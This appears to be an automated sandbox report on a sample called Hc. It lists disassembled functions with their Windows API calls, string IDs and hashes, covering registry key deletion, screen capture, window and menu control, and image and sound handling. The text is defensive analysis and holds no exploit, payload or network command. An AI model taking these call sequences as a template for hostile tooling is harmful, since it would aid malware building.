                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B8FFE
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9009
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9016
                                                                  • GlobalLock.KERNEL32(00000000), ref: 006B9024
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9033
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 006B903C
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9043
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006B66D6,?,?,00000000,?), ref: 006B9054
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,006C0C04,?), ref: 006B906D
                                                                  • GlobalFree.KERNEL32(00000000), ref: 006B907D
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 006B909D
                                                                  • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 006B90CD
                                                                  • DeleteObject.GDI32(00000000), ref: 006B90F5
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006B910B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3840717409-0
                                                                  • Opcode ID: 367b9ef6c4fdd057cf71f1f3bd70098cecdf8a93e7629a73f32f37b7cf652ef1
                                                                  • Instruction ID: 1d9e3567a77b2dadde27a8a9a49b1a65b3537a83017433172ef6e590e7ca2795
                                                                  • Opcode Fuzzy Hash: 367b9ef6c4fdd057cf71f1f3bd70098cecdf8a93e7629a73f32f37b7cf652ef1
                                                                  • Instruction Fuzzy Hash: D0413CB5600215BFDB119F65DC48EAE7BBAFF89715F104158FA05DB260E7309981DB20
                                                                  Function 006AC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006AC10E,?,?), ref: 006AD415
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD451
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4C8
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4FE
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006AC154
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006AC1D2
                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 006AC26A
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006AC2DE
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006AC2FC
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 006AC352
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006AC364
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 006AC382
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 006AC3E3
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006AC3F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 146587525-4033151799
                                                                  • Opcode ID: f56fc5fd3375a84cefb4167d7ce3bb7a391c9062b59597705907ac4516c62045
                                                                  • Instruction ID: 0abdfd3378a1f244ba9cb4b1cea32bf93c640717a92b13088915fe84e4262bd4
                                                                  • Opcode Fuzzy Hash: f56fc5fd3375a84cefb4167d7ce3bb7a391c9062b59597705907ac4516c62045
                                                                  • Instruction Fuzzy Hash: 02C17B75204611AFDB10EF24C494F6ABBE2BF85318F14859CE45A8B3A2CB71ED46CF91
                                                                  Function 006BA94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 006BA990
                                                                  • GetSystemMetrics.USER32(00000011), ref: 006BA9A7
                                                                  • GetSystemMetrics.USER32(00000004), ref: 006BA9B3
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 006BA9C9
                                                                  • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 006BAC15
                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006BAC33
                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006BAC54
                                                                  • ShowWindow.USER32(00000003,00000000), ref: 006BAC73
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 006BAC95
                                                                  • DefDlgProcW.USER32(?,00000005,?), ref: 006BACBB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                  • String ID: @$(o
                                                                  • API String ID: 3962739598-3877199045
                                                                  • Opcode ID: ed6194b4ca530d8f8b052a55736a3f7aa76f6d5f9b93b9882395b4dfa92e6711
                                                                  • Instruction ID: 32fb1979ab4a2358db1940cd32e265125f4f5c8eb30a6d373a2d2cd88fd117ab
                                                                  • Opcode Fuzzy Hash: ed6194b4ca530d8f8b052a55736a3f7aa76f6d5f9b93b9882395b4dfa92e6711
                                                                  • Instruction Fuzzy Hash: 99B176B1600219EFDF14CFA9C9857EE7BF2BF44704F188069EC59AA295D770A980CB61
                                                                  Function 006B976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006B97B6
                                                                  • GetFocus.USER32 ref: 006B97C6
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 006B97D1
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 006B9879
                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006B992B
                                                                  • GetMenuItemCount.USER32(?), ref: 006B9948
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 006B9958
                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006B998A
                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006B99CC
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006B99FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                  • String ID: 0$(o
                                                                  • API String ID: 1026556194-191991022
                                                                  • Opcode ID: 019280f1150c39797fdb5372b51c72503dcaa7fba6773f75ef873fb0f183e0cf
                                                                  • Instruction ID: 40de0c562f3671a231b8c8d07a8ac8a5547a833bd8351bdb694339f46009d06c
                                                                  • Opcode Fuzzy Hash: 019280f1150c39797fdb5372b51c72503dcaa7fba6773f75ef873fb0f183e0cf
                                                                  • Instruction Fuzzy Hash: F381CFB15083119FD720DF24C884AEB7BEAFB89314F140A1DFA8597291DB30D985CBB2
                                                                  Function 006A2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 006A3035
                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006A3045
                                                                  • CreateCompatibleDC.GDI32(?), ref: 006A3051
                                                                  • SelectObject.GDI32(00000000,?), ref: 006A305E
                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 006A30CA
                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006A3109
                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006A312D
                                                                  • SelectObject.GDI32(?,?), ref: 006A3135
                                                                  • DeleteObject.GDI32(?), ref: 006A313E
                                                                  • DeleteDC.GDI32(?), ref: 006A3145
                                                                  • ReleaseDC.USER32(00000000,?), ref: 006A3150
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                  • String ID: (
                                                                  • API String ID: 2598888154-3887548279
                                                                  • Opcode ID: f2beb4c1a0c677d006faed2743e8cdc0e470c5b7f89c7bda13aaf81fd1aa108d
                                                                  • Instruction ID: e2205a1db9af75fb99694529c9391d3bae651c0fa1adc75bbdde0516607b60d1
                                                                  • Opcode Fuzzy Hash: f2beb4c1a0c677d006faed2743e8cdc0e470c5b7f89c7bda13aaf81fd1aa108d
                                                                  • Instruction Fuzzy Hash: FC61C2B5D00219AFCF14DFA8D884EAEBBB6FF48310F208529E555A7250E771AD41CF94
                                                                  Function 006852AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 006852E6
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00685328
                                                                  • _wcslen.LIBCMT ref: 00685339
                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00685345
                                                                  • _wcsstr.LIBVCRUNTIME ref: 0068537A
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 006853B2
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 006853EB
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00685445
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00685477
                                                                  • GetWindowRect.USER32(?,?), ref: 006854EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                  • String ID: ThumbnailClass
                                                                  • API String ID: 1311036022-1241985126
                                                                  • Opcode ID: b6b428cd6c66ef1ae72683851a43f62389e3350ee0f256211a58392883dd3ef8
                                                                  • Instruction ID: ca637524bf5774871a435060ddb4cb26019cfde280ec9ab0817dde63323881ff
                                                                  • Opcode Fuzzy Hash: b6b428cd6c66ef1ae72683851a43f62389e3350ee0f256211a58392883dd3ef8
                                                                  • Instruction Fuzzy Hash: 3E91B071104B06AFD708EF24D894AEAB7EBFF41344F144619FA8B82291EB31ED55CB91
                                                                  Function 0068C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(006F29C0,000000FF,00000000,00000030), ref: 0068C973
                                                                  • SetMenuItemInfoW.USER32(006F29C0,00000004,00000000,00000030), ref: 0068C9A8
                                                                  • Sleep.KERNEL32(000001F4), ref: 0068C9BA
                                                                  • GetMenuItemCount.USER32(?), ref: 0068CA00
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0068CA1D
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 0068CA49
                                                                  • GetMenuItemID.USER32(?,?), ref: 0068CA90
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0068CAD6
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0068CAEB
                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0068CB0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                  • String ID: 0
                                                                  • API String ID: 1460738036-4108050209
                                                                  • Opcode ID: 40b4b4dbea2971c239bd2afa6b08ffb36e342b5614deb306313c532109566a2b
                                                                  • Instruction ID: 819ef2e082bd91544f47169c4a48ee6715557022e40cb638170b85410f20c5be
                                                                  • Opcode Fuzzy Hash: 40b4b4dbea2971c239bd2afa6b08ffb36e342b5614deb306313c532109566a2b
                                                                  • Instruction Fuzzy Hash: 1661BFB190024AAFDF25EF68C889EFE7BBAFB05364F040259E911A7251D730AD41CB71
                                                                  Function 0068E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0068E4D4
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0068E4FA
                                                                  • _wcslen.LIBCMT ref: 0068E504
                                                                  • _wcsstr.LIBVCRUNTIME ref: 0068E554
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0068E570
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 1939486746-1459072770
                                                                  • Opcode ID: 123c6e9220314d94a631a5fca50d29b06b6f10d1bede11844fe78cec22905812
                                                                  • Instruction ID: 279d574709ebbac6cd8aa896e2b0f726991816d18ddc9b25cce72d866643046f
                                                                  • Opcode Fuzzy Hash: 123c6e9220314d94a631a5fca50d29b06b6f10d1bede11844fe78cec22905812
                                                                  • Instruction Fuzzy Hash: BA412372A402147BEB40BB649C47EFF37AEDF51720F100129F901A6182FF769A4197A9
                                                                  Function 006AD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006AD6C4
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 006AD6ED
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006AD7A8
                                                                    • Part of subcall function 006AD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 006AD70A
                                                                    • Part of subcall function 006AD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 006AD71D
                                                                    • Part of subcall function 006AD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006AD72F
                                                                    • Part of subcall function 006AD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 006AD765
                                                                    • Part of subcall function 006AD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 006AD788
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 006AD753
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2734957052-4033151799
                                                                  • Opcode ID: 2e8d392947d0a3a0bc5f56e458876fa2ba839f4dfc5a398f83f87ea9929b7369
                                                                  • Instruction ID: 72fa0f5eb4c284d9d2633bacfa05023de6e0674824ace9df22a0d39be727ca4d
                                                                  • Opcode Fuzzy Hash: 2e8d392947d0a3a0bc5f56e458876fa2ba839f4dfc5a398f83f87ea9929b7369
                                                                  • Instruction Fuzzy Hash: 033181B5901128BBD725AF51DC88EFFBB7EEF46714F000165F806E7250EB349E469AA0
                                                                  Function 0068EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 0068EFCB
                                                                    • Part of subcall function 0063F215: timeGetTime.WINMM(?,?,0068EFEB), ref: 0063F219
                                                                  • Sleep.KERNEL32(0000000A), ref: 0068EFF8
                                                                  • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0068F01C
                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0068F03E
                                                                  • SetActiveWindow.USER32 ref: 0068F05D
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0068F06B
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0068F08A
                                                                  • Sleep.KERNEL32(000000FA), ref: 0068F095
                                                                  • IsWindow.USER32 ref: 0068F0A1
                                                                  • EndDialog.USER32(00000000), ref: 0068F0B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1194449130-3405671355
                                                                  • Opcode ID: 9699e732b111b03fd770c9d61a285f951e63d717e24e11b7250f82b78ac8997d
                                                                  • Instruction ID: f0c5a4a71a887fd368c14e84cd45ee064a6c85ba4cca0e44343ec6150c2217ae
                                                                  • Opcode Fuzzy Hash: 9699e732b111b03fd770c9d61a285f951e63d717e24e11b7250f82b78ac8997d
                                                                  • Instruction Fuzzy Hash: 90218BB6200215BFE7107F60ECA9A667B6BFB49744F102229F501C6372EF728C80DB61
                                                                  Function 0068F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0068F374
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0068F38A
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0068F39B
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0068F3AD
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0068F3BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$_wcslen
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 2420728520-1007645807
                                                                  • Opcode ID: 414a4b306278433cafd2bbd4445015673191d03065e57496cec172cdabf9e41f
                                                                  • Instruction ID: 945baab0a13140440c5e6a28c2b89830e87ae3191eb29aed264128da798ae4b3
                                                                  • Opcode Fuzzy Hash: 414a4b306278433cafd2bbd4445015673191d03065e57496cec172cdabf9e41f
                                                                  • Instruction Fuzzy Hash: 5511A7716912A97AD710B3A6DC4AEFF6B7EEFD1B00F4009397401E20D1EAA05D45CBE0
                                                                  Function 00652FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00653007
                                                                    • Part of subcall function 00652D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4), ref: 00652D4E
                                                                    • Part of subcall function 00652D38: GetLastError.KERNEL32(006F1DC4,?,0065DB51,006F1DC4,00000000,006F1DC4,00000000,?,0065DB78,006F1DC4,00000007,006F1DC4,?,0065DF75,006F1DC4,006F1DC4), ref: 00652D60
                                                                  • _free.LIBCMT ref: 00653013
                                                                  • _free.LIBCMT ref: 0065301E
                                                                  • _free.LIBCMT ref: 00653029
                                                                  • _free.LIBCMT ref: 00653034
                                                                  • _free.LIBCMT ref: 0065303F
                                                                  • _free.LIBCMT ref: 0065304A
                                                                  • _free.LIBCMT ref: 00653055
                                                                  • _free.LIBCMT ref: 00653060
                                                                  • _free.LIBCMT ref: 0065306E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
